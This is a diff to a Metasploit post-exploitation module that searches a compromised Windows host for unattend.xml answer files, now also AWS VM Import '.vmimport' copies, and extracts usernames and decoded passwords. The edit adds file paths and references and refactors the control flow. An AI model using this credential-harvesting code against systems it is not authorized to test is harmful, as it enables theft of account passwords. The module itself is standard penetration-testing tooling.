@@ -17,21 +17,30 @@ class MetasploitModule < Msf::Post
         'Description' => %q{
           This module will check the file system for a copy of unattend.xml and/or
           autounattend.xml found in Windows Vista, or newer Windows systems.  And then
-          extract sensitive information such as usernames and decoded passwords.
+          extract sensitive information such as usernames and decoded passwords.  Also
+          checks for '.vmimport' files that could have been created by the AWS EC2 VMIE service.
         },
         'License' => MSF_LICENSE,
         'Author' => [
           'Sean Verity <veritysr1980[at]gmail.com>',
           'sinn3r',
-          'Ben Campbell'
+          'Ben Campbell',
+          'GhostlyBox'
         ],
         'References' => [
           ['URL', 'http://technet.microsoft.com/en-us/library/ff715801'],
           ['URL', 'http://technet.microsoft.com/en-us/library/cc749415(v=ws.10).aspx'],
-          ['URL', 'http://technet.microsoft.com/en-us/library/c026170e-40ef-4191-98dd-0b9835bfa580']
+          ['URL', 'http://technet.microsoft.com/en-us/library/c026170e-40ef-4191-98dd-0b9835bfa580'],
+          ['URL', 'https://aws.amazon.com/security/security-bulletins/AWS-2024-006/'],
+          ['URL', 'https://www.immersivelabs.com/blog/the-return-of-unattend-xml-revenge-of-the-cleartext-credentials/']
         ],
         'Platform' => [ 'win' ],
-        'SessionTypes' => [ 'meterpreter', 'shell' ]
+        'SessionTypes' => [ 'meterpreter', 'shell' ],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [],
+          'Reliability' => []
+        }
       )
     )
 
@@ -42,13 +51,6 @@ class MetasploitModule < Msf::Post
     )
   end
 
-  #
-  # Determine if unattend.xml exists or not
-  #
-  def unattend_exists?(xml_path)
-    exist?(xml_path)
-  end
-
   #
   # Read and parse the XML file
   #
@@ -89,34 +91,25 @@ class MetasploitModule < Msf::Post
   end
 
   #
-  # If we spot a path for the answer file, we should check it out too
-  #
-  def get_registry_unattend_path
-    # HKLM\System\Setup!UnattendFile
-    fname = registry_getvaldata('HKEY_LOCAL_MACHINE\\System\\Setup', 'UnattendFile')&.strip
-    return fname
-  end
-
-  #
-  # Initialize all 7 possible paths for the answer file
+  # Initialize all possible paths for the answer file
   #
   def init_paths
     drive = expand_path('%SystemDrive%')
 
-    files =
-      [
-        'unattend.xml',
-        'autounattend.xml'
-      ]
+    files = [
+      'unattend.xml',
+      'autounattend.xml',
+      'unattend.xml.vmimport',
+      'autounattend.xml.vmimport'
+    ]
 
-    target_paths =
-      [
-        "#{drive}\\",
-        "#{drive}\\Windows\\System32\\sysprep\\",
-        "#{drive}\\Windows\\panther\\",
-        "#{drive}\\Windows\\Panther\Unattend\\",
-        "#{drive}\\Windows\\System32\\"
-      ]
+    target_paths = [
+      "#{drive}\\",
+      "#{drive}\\Windows\\System32\\sysprep\\",
+      "#{drive}\\Windows\\panther\\",
+      "#{drive}\\Windows\\Panther\Unattend\\",
+      "#{drive}\\Windows\\System32\\"
+    ]
 
     paths = []
     target_paths.each do |p|
@@ -125,16 +118,17 @@ class MetasploitModule < Msf::Post
       end
     end
 
-    # If there is one for registry, we add it to the list too
-    reg_path = get_registry_unattend_path
+    # Add UnattendFile path from the Windows Registry (if present)
+    reg_path = registry_getvaldata('HKEY_LOCAL_MACHINE\\System\\Setup', 'UnattendFile')&.strip
     paths << reg_path unless reg_path.blank?
+
     return paths
   end
 
   def run
     init_paths.each do |xml_path|
       # If unattend.xml doesn't exist, move on to the next one
-      unless unattend_exists?(xml_path)
+      unless exist?(xml_path)
         vprint_error("#{xml_path} not found")
         next
       end
@@ -143,7 +137,7 @@ class MetasploitModule < Msf::Post
       save_raw(xml_path, raw)
 
       # XML failed to parse, will not go on from here
-      return unless xml
+      next unless xml
 
       results = Rex::Parser::Unattend.parse(xml)
       table = Rex::Parser::Unattend.create_table(results)
@@ -153,7 +147,7 @@ class MetasploitModule < Msf::Post
       # Save the data to a file, TODO: Save this as a Mdm::Cred maybe
       save_cred_tables(table) unless table.nil?
 
-      return unless datastore['GETALL']
+      break unless datastore['GETALL']
     end
   end
 end
